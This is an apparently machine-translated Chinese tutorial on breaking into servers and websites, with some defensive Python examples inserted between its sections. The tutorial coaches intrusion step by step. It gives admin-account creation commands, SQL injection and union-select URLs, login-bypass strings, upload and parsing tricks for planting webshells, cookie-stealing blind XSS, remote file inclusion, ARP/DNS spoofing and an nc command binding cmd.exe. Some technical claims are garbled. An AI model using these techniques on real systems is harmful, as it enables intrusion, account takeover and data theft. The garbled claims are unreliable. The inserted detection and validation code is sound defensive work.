Security penetration by80

Source: Internet
Author: User
Tags: mdb database, php website, server, dns spoofing
Chapter 1: Port commands

1. Ports. The word is easy to understand. A computer has 65535 ports in total, but only a few dozen are actually used. Common ports:

135, 445, 5900, 3389, 80, 53, and so on. A port is like a chimney on a house: once it is open, it can bring risks. Take 3389, the Remote Desktop port. It is used in two ways. One is legitimate network interaction: one computer connects to the desktop of another computer, and the command is mstsc. The other is by hackers: a "3389 intrusion" uses exactly this function, and the classic target is a Windows XP system with an empty password. That is, if the Windows XP password is empty and port 3389 is enabled, a hacker who scans and finds the port can connect remotely by IP address, enter administrator with an empty password in the logon window, and see the other side's desktop. The drawback of 3389 for the intruder is that if the other side notices the mouse moving, the Remote Desktop session is closed. An empty password and a null connection are different things. A null connection is an IPC$ null session, in the form net use \\IP\IPC$ "" /user:"admin", which makes a blank connection to the target address when the password is empty. If the connection succeeds, a mapping can follow: net use Z: \\IP\C$ is the remote mapping command, which maps drive C of the target server to local drive Z, so the content of the target server's C drive can be accessed through the local Z drive. Enabling 3389 on a server is done with the remote connection option in the system settings, where you can also check whether it is on.

Port 4899. 4899 works like 3389, but the connection goes through the Radmin server. 4899 is usually checked for empty passwords: if that weakness exists, the Radmin server can be connected to remotely for full remote control.

Port 135. 135 is an overflow port. In an Internet cafe, running netstat -an shows which ports are open; Internet cafes generally have 135 and 445 open. Malicious users generate Trojans with remote control software, and once the intranet mapping succeeds they upload the Trojans in bulk to the other machines, so many computers end up as bots.

Port 5900. 5900 is generally aimed at foreign servers: attackers use a VNC connection tool to probe 5900 on foreign servers in bulk. This needs VPN proxy technology, and SYN scanning is usually used because it avoids the latency of a full TCP handshake.

1433. Everyone knows port 1433: it is the SQL Server port. 1433 is usually used to probe for a weak SA password, and that is what a 1433 connection tool does. The caller obtains the password file, enters the user name, password and database name, connects remotely to the other party's database, then runs the SQL privilege escalation commands, and the server intrusion is complete.

3306. The MySQL port. The file that leaks the credentials is usually conn.asp, config.php or common.inc.php, which holds the root directory of the website; the caller obtains this data. There are generally two directions: 1. MySQL database dumping, 2. MySQL privilege escalation. Database dumping targets forum servers and member data: MySQL is used to connect remotely to the database, the Members table is located with select * from Members, and the result is exported as a SQL file to the local machine, where the detailed member data is then stored. MySQL privilege escalation means raising permissions: you need to export the DLL file and then execute the SQL command that adds an account to the administrators group. Generally, when the MySQL version is above 5.0 the export must go to the installation directory; below 5.0 it can be exported to C:/Windows/UDF.DLL, because later versions added restrictions!


Commands are equally important: Windows and Linux system commands and MS-DOS commands. Roughly, these commands should be remembered:

Windows: net user <name> <password> /add adds an account; net localgroup administrators <name> /add adds that account to the administrators group

wmic process: view the detailed path of every process in the current system

arp -a: view the MAC addresses known to the current system

tracert -d: route tracing

ping: connectivity test command

systeminfo: view the system configuration information

md, ren, rd: create a directory, rename a directory, delete a directory

netstat: -v shows what is working in detail; -a shows the current listening ports; -n shows connections in progress in numeric form; -an shows which ports are open

at: scheduled tasks
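The chapter tells the reader to run netstat -an and see which of the ports it lists are open. The following is an added example, not code from the original tutorial: it parses netstat -an output (Windows layout) and flags listening sockets on the ports the chapter names, distinguishing loopback-only listeners from ones bound to every interface. The port-to-service mapping is the chapter's own; the netstat text is constructed sample output.

```python
"""Parse `netstat -an` output and flag listening sockets on the ports this
chapter names as commonly abused.  Added example, not code from the original
tutorial.  The port-to-service mapping is the chapter's own; the netstat text
below is constructed sample output (Windows layout)."""
import re

# Ports the chapter singles out, with the service it associates with each.
WATCHED_PORTS = {
    135: "RPC (overflow port)",
    445: "SMB / IPC$ null session",
    1433: "SQL Server",
    3306: "MySQL",
    3389: "Remote Desktop",
    4899: "Radmin",
    5900: "VNC",
}

# Proto, local addr:port, foreign addr, optional state (UDP rows have no state).
NETSTAT_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s*(\S*)")

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
  TCP    192.0.2.10:3389        203.0.113.7:51234      ESTABLISHED
  UDP    0.0.0.0:500            *:*
"""


def listening_ports(netstat_text):
    """Return {port: local_address} for every TCP socket in LISTENING state."""
    found = {}
    for line in netstat_text.splitlines():
        m = NETSTAT_ROW.match(line)
        if not m:
            continue  # header, blank, or unparsable line
        proto, addr, port, _foreign, state = m.groups()
        if proto == "TCP" and state == "LISTENING":
            found[int(port)] = addr
    return found


def exposed_watched_ports(netstat_text):
    """Watched ports that listen on something other than loopback, i.e. the
    ones reachable from the network (0.0.0.0 or [::] means every interface)."""
    return {
        port: WATCHED_PORTS[port]
        for port, addr in listening_ports(netstat_text).items()
        if port in WATCHED_PORTS and addr not in ("127.0.0.1", "[::1]")
    }


if __name__ == "__main__":
    for port, service in sorted(exposed_watched_ports(SAMPLE_NETSTAT).items()):
        print(f"port {port} ({service}) is listening on a network-facing address")
```

In the sample, 3306 is bound to 127.0.0.1 and is therefore not reported, while 135, 445 and 3389 are bound to 0.0.0.0 and are: those are the ones a firewall rule or a bind-address change should close before anyone scans for them.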




Chapter 2: Web script security

Web script security is also a top priority in network security. How should we understand script security?

First we need to understand the website's type and architecture: ASP website, PHP website, JSP website, ASPX website, CGI, and so on.

In general, security ranks from lowest to highest: ASP < PHP < ASPX < JSP.

We can see that ASP has the lowest security. We all know that a website's program is written by programmers, and vulnerabilities can creep in. Once a vulnerability exists, someone will succeed in exploiting it. That is what web script security is about.

It requires a certain understanding of web security and proficiency in web attack and defense techniques.

The server administrator puts the website on the Internet so that many people can access it, so the server is open. Since it has to communicate with the external network, script security is born from that. The birth of one technology always means the derivation of another, like assembly and disassembly.

The virtual sites set up on external websites are checked one by one to discover vulnerabilities.

Principle: through a programming vulnerability, a script Trojan is written remotely into the root directory of the server's website; the external path is then connected to, forming a web backdoor.

Advantage: one-way penetration of the server itself is the exception; script security has taken its place, with the route being to obtain shell permission through the script and then escalate on the server.


ASP website vulnerability analysis:

ASP websites are generally used by small enterprises.

Common vulnerabilities: SQL injection, database exposure, directory traversal, unauthorized access, upload, weak password, social engineering, XSS, editor, Cookie, 'or', FTP, brute force

Cause of SQL injection: variables are filtered loosely.

Database exposure is caused by a failure to write fault-tolerant code.

Test method for injection: and 1=1 and and 1=2. The prerequisite is a dynamic website rather than a static one.

Open a dynamic news page on the website and submit:

http://www.baidu.com/asp/asp?id=30%20and%201=1 -> normal

http://www.baidu.com/asp/asp?id=30%20and%201=2 -> error

Injection: both tool injection and manual injection are acceptable.

You need to guess the table, table name, column name and user, and finally obtain the password.

Passwords are generally stored as hexadecimal (MD5) hashes and need to be decrypted on a dedicated MD5 website.

Database exposure comes in these forms: conn exposure, %5c exposure, %23 exposure


Conn exposure happens because the administrator did not prevent outsiders from accessing the file.

Resulting access: http://www.adminx.com/admin/conn.asp will show the specific path of the database if an error is reported

http://www.adminx.com/inc/config.asp is generally prohibited

http://www.adminx.com/inc/conn.asp is generally blank

%5c is the exposure method for second-level directories

Format: http://www.admin.com/asp/uid?id=1 -> normal page

http://www.admin.com/asp/%5cuid?id=1 -> if successful, a "download database" prompt pops up

%23 is another exposure method

We know that databases are usually found at paths like www.xxx.com/data, www.xxx.com/database, www.xxx.com/datas.

These are usually 403 Forbidden. But if we know the real name of the database:

Example: accessing http://www.xxx.com/databases/#xin_wenku.mdb shows the forbidden page

Accessing http://www.xxx.com/databases/%23xin_wenku.mdb pops up the mdb database download


Directory traversal means the administrator placed no restrictions on access to the sub-directories under the website root, so the caller can access these directories and use the information collected there for the next step as needed.

Example: http://www.xxx.com/manage/./ -> directory traversal; you can see many directories

Unauthorized access means the administrator placed no permission restrictions on the backend file pages under the directory, so the caller can access the page anonymously.

Getting into the backend of a system is very dangerous; sometimes that is how the caller intrudes into a site.

Example: http://www.xxx.com/manage/asp/edit.moneyasp?id=#

Possible pages: news publishing page, administrator adding page, member list page, website layout page, and so on.

Upload vulnerabilities, that is, the website's image upload points. Some upload addresses are quite private; they are meant for user groups to upload images, pictures, or company PDF, XLS and DOC files, but some people abuse them.

There are many common upload vulnerability types, including: gif89a image Trojan disguise, one-sentence Trojan, IIS parsing

Examples: http://www.xxx.com/include/upload.jsp http://www.com/include_admin/upload.asp http://www.com/upload_class.asp

For example, the user saves the source code of the upload page into a local Notepad file, writes gif89a as the first line of the source, and submits it as an image.

A one-sentence Trojan can also be merged into the image. For example, the earlier nginx vulnerability was implemented using the IIS two-way parsing function.

Example: http://www.xxx.com/php/ass/1.jpg/ is the image address. If it displays normally, access 0x.php under it.

http://www.xxx.com/php/ass/1.jpg/0x.php will appear blank; you see nothing, but in fact the backdoor has succeeded!

Connect with the one-sentence Trojan PHP client, enter the password, and upload the script Trojan to the website root to obtain webshell permission.

Parsing examples: 1.asp;.jpg 1.jpg.asp 2.asa0000.gif 0x0000x.jpg 00000x0000y.jpg

This means that although the name ends in an image format, it is executed through ASP or ASA, which is effectively executing our script Trojan!
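The upload section above lists the tricks that get a script past an image upload: a gif89a header glued onto script code, double extensions like 1.jpg.asp, the IIS6 1.asp;.jpg form, and the 1.jpg/0x.php path-info trick. The following is an added example, not code from the original tutorial, showing the server-side checks that defeat each of them. The allow-list, the script-extension list and the sample file contents are constructed assumptions.

```python
"""Server-side checks for an image upload endpoint against the tricks
described above: double extensions (1.jpg.asp), the IIS6 semicolon form
(1.asp;.jpg), null-byte truncation, and a gif89a header glued onto script
code.  Added example, not code from the original tutorial; the allow-list,
extension list and sample files are assumptions/constructed."""
import os
import re
import secrets

# Only the formats the page says the backend accepts, each with its magic bytes.
ALLOWED_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "bmp": (b"BM",),
}
# Extensions a web server might execute; none may appear anywhere in the name.
SCRIPT_EXTENSIONS = {"asp", "asa", "cer", "cdx", "aspx", "ashx", "php", "php3",
                     "php5", "phtml", "jsp", "jspx", "cgi", "pl", "sh", "exe"}


def _clean_name(original_name):
    """Strip any directory part the client sent (both separator styles)."""
    return os.path.basename(original_name.replace("\\", "/"))


def _extension_tokens(name):
    """Every token after the first dot, splitting on '.' and ';' so that
    '1.asp;.jpg' yields ['asp', '', 'jpg'] and '1.jpg.asp' yields ['jpg', 'asp']."""
    return re.split(r"[.;]", name.lower())[1:]


def reject_reason(original_name, content):
    """Return None if the upload is acceptable, otherwise a short reason."""
    name = _clean_name(original_name)
    if "\x00" in name or "%00" in name.lower():
        return "null byte in file name"
    tokens = _extension_tokens(name)
    if any(t in SCRIPT_EXTENSIONS for t in tokens):
        return "script extension present in file name"
    if not tokens or tokens[-1] not in ALLOWED_TYPES:
        return "extension not in allow-list"
    if not content.startswith(ALLOWED_TYPES[tokens[-1]]):
        return "content does not match declared image type"
    # A valid GIF header followed by <?php ... ?> or <% ... %> is the gif89a
    # disguise from the text; magic bytes alone cannot catch it.  This marker
    # scan is a heuristic (binary image data could contain these bytes by
    # chance), so it is a second layer, not the control.
    if b"<?" in content or b"<%" in content:
        return "embedded script markers in image body"
    return None


def stored_name(original_name, content):
    """Name to store the file under: a random token plus the *validated*
    extension, so nothing the uploader chose survives into the path.  The
    directory it lands in must also be configured to never execute scripts,
    which is what defeats the 1.jpg/0x.php path-info trick."""
    reason = reject_reason(original_name, content)
    if reason:
        raise ValueError(reason)
    return secrets.token_hex(16) + "." + _extension_tokens(_clean_name(original_name))[-1]


# Constructed sample contents.
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 32
GIF_WITH_CODE = b"GIF89a<?php echo 'backdoor'; ?>"
```

The three layers matter together: the name check stops every parsing trick the text lists, the magic-byte check stops a script renamed to .jpg, and the random server-side name plus a non-executing storage directory is what actually prevents execution when a disguised file does get through.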


Weak passwords. On some websites the administrators set passwords that are too simple; passwords such as 123, 456, 123456, admin, admin888, admin123 may be cracked by hackers, and the website's security is threatened!

Social engineering: this is a very powerful technique. Its practitioner needs to grasp and see through the psychological state of the target. It actually means "psychological cracking": for example, to crack a mailbox, he collects all the information available about its owner, analyzes the owner's daily routine and habits, and finally cracks the password! Many bookstores also sell books on this at around 30-40 yuan!




XSS is a type of passive attack. Generally there are XSS cross-site attacks and XSS blind attacks.

Basic example: <SCRIPT>alert("1")</SCRIPT> -> a dialog box showing 1

<SCRIPT>alert(document.cookie)</SCRIPT> -> the cookie value is displayed

<SCRIPT>window.open("http://baidu.com")</SCRIPT> -> opens the Baidu website

Cross-site example: www.xxx.com/asp/asp?id="><SCRIPT>alert("0")</SCRIPT>

Trojan cross-site example: www.xxx.com/asp/asp?id=<IFRAME src="url">0x</IFRAME>, which needs to be converted to hex format

Dynamic example embedded in a frame: www.xxx.com/asp/asp?id=<IFRAME src="url">0x</IFRAME><marquee>Hello</marquee>

Blind XSS means writing our own JS code into a message page. The administrator generally reviews such messages, and when he opens it, his cookie is automatically saved to our backdoor.

Example: http://www.xxx.com/cookie/cookie.asp
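Every XSS form shown above works because user input is written back into the page as live markup, and the blind variant pays off only because document.cookie can read the administrator's session. The following is an added example, not code from the original tutorial, showing the two defenses: output encoding for the body and attribute contexts the text uses, and an HttpOnly session cookie. The page templates and cookie name are assumptions; the payload strings are the ones from the text.

```python
"""Output encoding and cookie flags that neutralise the XSS payloads shown
above.  Added example, not from the original tutorial; the page templates
and cookie name are assumptions."""
import html
from http.cookies import SimpleCookie


def render_comment(user_text):
    """HTML body context: every user-supplied character that could start
    markup (&, <, >, ", ') becomes an entity, so <SCRIPT>alert("1")</SCRIPT>
    is displayed as text instead of running."""
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


def render_search_box(id_param):
    """HTML attribute context, the page's  id="><SCRIPT>  case: quote=True
    encodes the double quote, so the attacker cannot close the attribute
    and start a new tag."""
    return '<input name="id" value="%s">' % html.escape(id_param, quote=True)


def session_cookie_header(session_value):
    """Set-Cookie line for the session.  HttpOnly keeps the value out of
    document.cookie, so the blind-XSS cookie.asp collector described above
    receives nothing even if a script does run; Secure and SameSite limit
    where the browser will send it."""
    jar = SimpleCookie()
    jar["session"] = session_value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Strict"
    return jar.output()


# Payloads in the forms used in the text above (constructed test input).
BASIC_XSS = '<SCRIPT>alert("1")</SCRIPT>'
ATTRIBUTE_BREAKOUT = '"><SCRIPT>alert("0")</SCRIPT>'
IFRAME_INJECT = '<IFRAME src="url">0x</iframe>'


if __name__ == "__main__":
    print(render_comment(BASIC_XSS))
    print(render_search_box(ATTRIBUTE_BREAKOUT))
    print(session_cookie_header("constructed-session-id"))
```

Encoding is context-specific: the attribute case needs the double quote encoded, which is why quote=True is passed explicitly rather than relied on. The cookie flag does not stop the script from running, but it turns the cookie-stealing blind attack into one that collects nothing.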


Editor vulnerabilities appeared very early. They are generally divided into eWebEditor and FCKeditor vulnerabilities.

The editor backend is generally ewebeditor/admin_login.asp

ewebeditor/ewebeditor.aspx ewebeditor/ewebeditor.htm ewebeditor/ewebeditor.asp?id=1 ewebeditor/admin_style.asp

ewebeditor/admin/DB/#ewebeditor.mdb, ewebeditor/DB/#ewebedior1033.mdb

The password is usually admin888, admin or admin999.

FCKeditor vulnerability

There are also many ways to use it. PHP CMSs can use the editor to upload and obtain permissions.

http://www.xxx.com/admin/FCKeditor/../.../../

Cookie transit. This vulnerability comes from another injection method, called cookie injection, used when normal SQL injection fails.

Preparation tools: the Small Tornado ASP server environment, plus injection and table-guessing tools

First, set the environment's port to 82 or 81.

Next, find a page and generate the local 127 page.

Comparison: http://www.xxx.com/asp/aasp?id=1 -> injection failed

http://127.0.0.1:81/root address/post submit value -> can be injected


'or' vulnerability, the well-known 'or'='or' vulnerability

For the backend management systems of some ASP websites, enter 'or'='or' as both the user name and the password.

If successful, you go straight into the backend.

User: 'or'='or'

Password: 'or'='or'
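Both the and 1=1 / and 1=2 injection test earlier in this chapter and the 'or'='or' login string above work for the same reason: the parameter is pasted into the SQL text, so it becomes syntax. The following is an added example, not code from the original tutorial, that runs the page's own inputs against a concatenating query and against a parameterized one on an in-memory SQLite database. The tables, rows and query shapes are constructed. Whether the concatenated 'or'='or' expression evaluates true depends on the database engine's boolean rules (SQLite treats it as false), so the example shows the statement it produces rather than asserting an engine-specific outcome; the parameterized version never evaluates it at all.

```python
"""The `and 1=1` / `and 1=2` probe and the 'or'='or' login string, run against
string-concatenated SQL and against parameterized SQL, using an in-memory
SQLite database.  Added example, not code from the original tutorial; the
tables, rows and query shapes are constructed."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (30, 'constructed article')")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'constructed-secret')")
    return db


def news_title_vulnerable(db, id_param):
    # The id value is pasted straight into the statement, so "30 and 1=2"
    # becomes part of the WHERE clause: the true/false pair from the text
    # changes the result and tells the prober the input reaches SQL.
    sql = "SELECT title FROM news WHERE id=" + id_param
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def news_title_safe(db, id_param):
    # Validate the type first, then bind: the value can never become syntax.
    try:
        id_value = int(id_param)
    except ValueError:
        return None  # "30 and 1=1" is not an integer: reject, do not query
    row = db.execute("SELECT title FROM news WHERE id=?", (id_value,)).fetchone()
    return row[0] if row else None


def login_sql_vulnerable(username, password):
    """Return the statement a concatenating login would execute, to show how
    'or'='or' in both fields breaks out of the quotes.  Whether the resulting
    boolean expression is true depends on the database engine's rules, which
    is why the fix is to never let the input become syntax at all."""
    return ("SELECT COUNT(*) FROM admin WHERE username='" + username +
            "' AND password='" + password + "'")


def login_safe(db, username, password):
    """Parameterized login: the quotes inside 'or'='or' are data, compared
    literally against the stored column, so the bypass string simply fails."""
    row = db.execute("SELECT COUNT(*) FROM admin WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] == 1


BYPASS = "'or'='or'"  # the universal-password string from the text


if __name__ == "__main__":
    db = make_db()
    print(news_title_vulnerable(db, "30 and 1=1"), news_title_vulnerable(db, "30 and 1=2"))
    print(news_title_safe(db, "30"), news_title_safe(db, "30 and 1=1"))
    print(login_sql_vulnerable(BYPASS, BYPASS))
    print(login_safe(db, BYPASS, BYPASS))
```

The vulnerable news lookup returns the article for "30 and 1=1" and nothing for "30 and 1=2", which is exactly the normal/error pair the chapter uses as its injection test; the safe version gives the same answer for both because neither is a valid id. The same rule, bind values and never concatenate them, is what makes the login immune to the 'or'='or' string regardless of engine.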


FTP vulnerabilities generally occur in two forms: anonymous access and weak passwords.

Example: anonymous access to ftp://www.xxx.com, entering directly

Weak password: ftp://www.cc.com user: ftp pass: [email protected], enter the password

For example, if a TXT file whose content is 1 is placed on the FTP, it can then also be accessed at http://www.cc.com/1.txt

Brute force. Brute-force cracking generally means collecting many ready-made dictionaries for the password of a mailbox, QQ account, or website backend, and then launching a targeted crack, which takes a long time!


PHP website vulnerability analysis

Generally, injection vulnerabilities come first.

Example: http://www.ccc.com/asp/php?id=10%20order%20by%201 -> guess the number of fields

http://www.ccc.com/asp/php?id=10%20order%20by%2018 -> normal

http://www.ccc.com/asp/php?id=10%20order%20by%2020 -> error

So 19 fields can be determined. The 19 fields are then spelled out in the address in turn, with 3 common variables: database(), version(), user()

You need to know how the three functions are used; load_file() reads C:/win.ini, and hex() with the mid() function can also be used during injection to read the path.

Path example: D:/wwwroot/PHP/uC/config.php

Example: http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%201,2,3,4,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -> the page shows normally, meaning success

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%201,...,19%20from%20Admin -> error page, the table cannot be found

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%201,2,3,4,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20admin_user -> the page is normal, the table is found; it usually displays a few numbers, such as 3, 6, 8, and so on. We generally take 3 and 6

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%201,2,user(),...%20from%20admin_user -> view the user: [email protected]

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%20...,version(),...%20from%20admin_user -> view the database version. A version above 5.0 can be cracked.

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%20...,database(),...%20from%20admin_user -> view the database name

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%201,2,user,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20admin_user -> if the page is normal, the user and password column names are guessed correctly; otherwise an error 404 is returned.

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%20...,load_file(read ini address),...%20from%20admin_user

http://www.ccc.com/asp/php?id=10%20and%201=2%20union%20select%20...,hex(mid(...)),...%20from%20admin_user
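The request shapes in this chapter (and 1=1 / and 1=2, order by N, union select with user(), version(), database() and load_file(), the %5c and %23 database-exposure URLs) are all visible in a web server's access log. The following is an added example, not code from the original tutorial, that scans Common Log Format lines for those probe families and reports sources that run through several of them, which is what an enumeration looks like from the server side. The log lines are constructed and the pattern list is an assumption distilled from the URLs above.

```python
"""Detect the injection and database-exposure probes shown in this chapter in
web-server access logs.  Added example, not code from the original tutorial;
the log lines are constructed (Common Log Format) and the pattern list is an
assumption distilled from the request shapes above."""
import re
from urllib.parse import unquote_plus

# Probe families matched on the percent-decoded URL.
DECODED_PATTERNS = {
    "boolean-probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),       # and 1=1 / and 1=2
    "order-by-count": re.compile(r"\border\s+by\s+\d+", re.I),           # order by 18 / 20
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "mysql-info-function": re.compile(r"\b(load_file|database|version|user)\s*\(", re.I),
}
# These two only make sense on the raw (still percent-encoded) request.
RAW_PATTERNS = {
    "backslash-%5c-exposure": re.compile(r"/%5c", re.I),               # /asp/%5cuid?id=1
    "mdb-%23-download": re.compile(r"%23[^/?]*\.mdb\b", re.I),          # /databases/%23x.mdb
}

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

SAMPLE_LOG = [  # constructed
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /asp/news.asp?id=30%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /asp/news.asp?id=30%20and%201=2 HTTP/1.1" 500 312',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /php/news.php?id=10%20order%20by%2020 HTTP/1.1" 500 288',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /php/news.php?id=10%20and%201=2%20union%20select%201,2,user(),4 HTTP/1.1" 200 4010',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /databases/%23xin_wenku.mdb HTTP/1.1" 200 917504',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /asp/news.asp?id=31 HTTP/1.1" 200 5098',
]


def classify_request(raw_url):
    """Return the set of probe families a single request URL matches."""
    decoded = unquote_plus(raw_url)
    hits = {name for name, pat in DECODED_PATTERNS.items() if pat.search(decoded)}
    hits |= {name for name, pat in RAW_PATTERNS.items() if pat.search(raw_url)}
    return hits


def scan_log(lines):
    """Return (ip, url, status, [families]) for each line that matches a probe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        families = classify_request(m["url"])
        if families:
            findings.append((m["ip"], m["url"], int(m["status"]), sorted(families)))
    return findings


def suspicious_sources(lines, min_families=2):
    """IPs that hit at least `min_families` distinct probe families.  One
    'and 1=1' can be noise; a sequence of different probes is enumeration."""
    per_ip = {}
    for ip, _url, _status, families in scan_log(lines):
        per_ip.setdefault(ip, set()).update(families)
    return {ip: sorted(f) for ip, f in per_ip.items() if len(f) >= min_families}


if __name__ == "__main__":
    for ip, url, status, families in scan_log(SAMPLE_LOG):
        print(ip, status, families, url)
    print(suspicious_sources(SAMPLE_LOG))
```

The status code next to each hit is worth keeping: a 200 with a large byte count on the %23 .mdb request means the database download the chapter describes actually succeeded, while the 500 on "and 1=2" is the error page that confirms the injection to the prober.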


There are also 0days in some system source code, such as the online forum, the old Y article system, the mobile science system, Fengxun, DedeCMS, Empire CMS, and so on. In general, some of these vulnerabilities are exploited with an injection exp, some require a getshell; you build the PHP environment yourself and then enter the command-execution exploit in a DOS window. The open-source tool MSF, for example, is an integrated overflow platform that can be driven directly by commands such as show exploits.

In addition, there is the PHP file inclusion vulnerability.

Example format: http://www.a.com/asp/id=http://www.b.com/1.php

That is, the permission obtained at point A reads the source code of point B through the inclusion, so point B is used and we obtain B's permissions this way.

But the premise is to get permission at A first!

With ASPX, a CER-form vulnerability or a universal password vulnerability sometimes occurs as well.




JSP vulnerability analysis

JSP is generally used by banks and news portals; for outsiders its security is relatively high. However, although JSP security is the highest, note that in privilege escalation JSP has the largest permissions, whereas ASP anonymous permissions are reduced compared with insecure ASP websites! MySQL may also be downgraded!

Vulnerabilities are generally found where only JS verification is done and nothing is filtered, which causes upload vulnerabilities.

Second-level domain upload vulnerability

Examples: http://www.xx.gov.cn http://ad.xx.gov.cn/upload.asp http://svx.xx.gov.com/upload.php

<!-- enctype and the field name are required for the browser to actually send the file -->
<form action="sadd.jsp" method="post" enctype="multipart/form-data"><br/>
<input type="file" name="file"><br/>
<input type="submit" value="Go!">
</form>


Backend management permission technique

If we get into the website's backend through a simple password test, we can use various methods to obtain webshell permission.

For example: database backup, packet capture, packet modification, address construction, double upload, parsing, direct upload, and so on

Supported formats: GIF, BMP and JPG

Prohibited formats: CER, ASP, PHP, JSP and ASPX

The birth of the bypass (side-site) vulnerability: many domain names are bound on the website server, including a shopping site, a talent-recruitment site and a news site. Our target is the news site, but the test does not find many vulnerabilities in it; at this point we can start from the talent site and finally obtain the news site's permissions through cross-directory access or ASPX IIS permission read/write.




C segment (CIDR block), which is expressed by IP address. A C segment contains 255 machines, from 210.44.123.1 to 210.44.123.255. For example, the caller's target address is 210.44.123.5.

At this point we only need to find one server in this segment and then sniff from it. If the target does not have a firewall installed, it will be sniffed; this is how servers in an isolated state are reached.

Expression: A and B

A: the target server

B: a server found in the same network segment, the C segment

B => A: finally the data is sniffed and redirected to the target

Hijacking and spoofing are both done with Cain and NetFuke.

Hijacking is generally divided into domain name hijacking and ARP hijacking.

Generally a server in the same CIDR block is the same as a C-segment server, but the difference is that hijacking is used.

That is, a spoofed traffic packet is sent to the target server, and once the server is fooled, the homepage file is automatically changed to the desired content.

Spoofing is generally ARP or DNS spoofing. ARP spoofing is mainly used to capture the target machine's 3389 traffic, which is saved in text format.

Opening it with the C32 disassembly tool, you can clearly see the user name and password leaked after the address.


Server privilege escalation

On a self-built shell website, if you do not escalate permissions you cannot proceed to the next step.

So we need to learn privilege escalation techniques.

However, escalation techniques generally apply to Windows and Linux separately.

Common tools: Brazilian barbecue (churrasco), PR, NC listener, LCX forwarding, Win2003 kernel overflow, IIS6 0day, MS exploit EXEs, shift backdoor

Privilege escalation checklist

1. Check the website permissions, such as the ASP anonymous permission, and whether ASPX is supported

2. Check whether the WC component is supported.

3. In general, the permissions on the recycle bin and temp directories are relatively broad.

4. Check the passwords in config.asp and conn.asp

5. Check the files of the FXP transfer tool.

6. Check whether PCAnywhere is installed.

7. Check whether the Serv-U FTP server is installed.

8. Check whether port 3389 is enabled.

9. Check whether the directory's file program can be replaced.

10. Check whether the Radmin password exists.

11. Check whether JSP permissions are supported.

This is the public-network method. For an intranet you need forwarding: first listen locally, then forward to 3389, and connect with the local 127 address and the listening port to the other party's 3389.

NC rebound command: C:\windows\nc.exe -l -p 5858 -t -e C:\Windows\cmd.exe

Another one is shellcode, which is where the road begins!